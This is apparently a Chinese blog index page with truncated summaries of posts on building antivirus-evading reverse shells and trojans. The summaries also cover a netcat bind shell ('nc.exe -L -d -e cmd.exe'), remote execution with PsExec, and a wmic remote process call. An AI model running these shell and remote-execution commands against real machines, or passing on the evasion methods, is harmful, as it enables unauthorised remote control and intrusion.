摘要:
这里仅用反弹powershell演示,大家可以发挥脑洞 自创反弹shell免杀五部曲: 1:确定想法 2:实现框架 3:增加保护 4:启动木马 5:维持会话或提权 1|2一,确定想法 用python服务器与客户端的原理制作反弹shell的控制端与被控制端, 最后执行在会话中执行恶意命令来获取一个稳定 阅读全文
摘要:
正向shell: 132机器A上:==>是c2的client nc.exe -L -d -e cmd.exe -p 5555 134机器B上: nc64.exe XXX.132 5555 然后就可以输入命令远控132机器了! 我的nc都放在了桌面,所以在桌面cmd即可! 反弹shell例子: 134 阅读全文
摘要:
最终效果: C:\Users\PSTools>psexec \\XXXIP -u XXX -p XXX -i cmd.exe PsExec v2.4 - Execute processes remotely Copyright (C) 2001-2022 Mark Russinovich Sysin 阅读全文
摘要:
背景:wmic 运行时候出现拒绝访问错误: wmic /node:xxxIP /user:xxx /password:xxx process call create "cmd.exe /c ipconfig>c:\users\xxx\result.txt" 错误: 描述 = 拒绝访问。 解决方法如下 阅读全文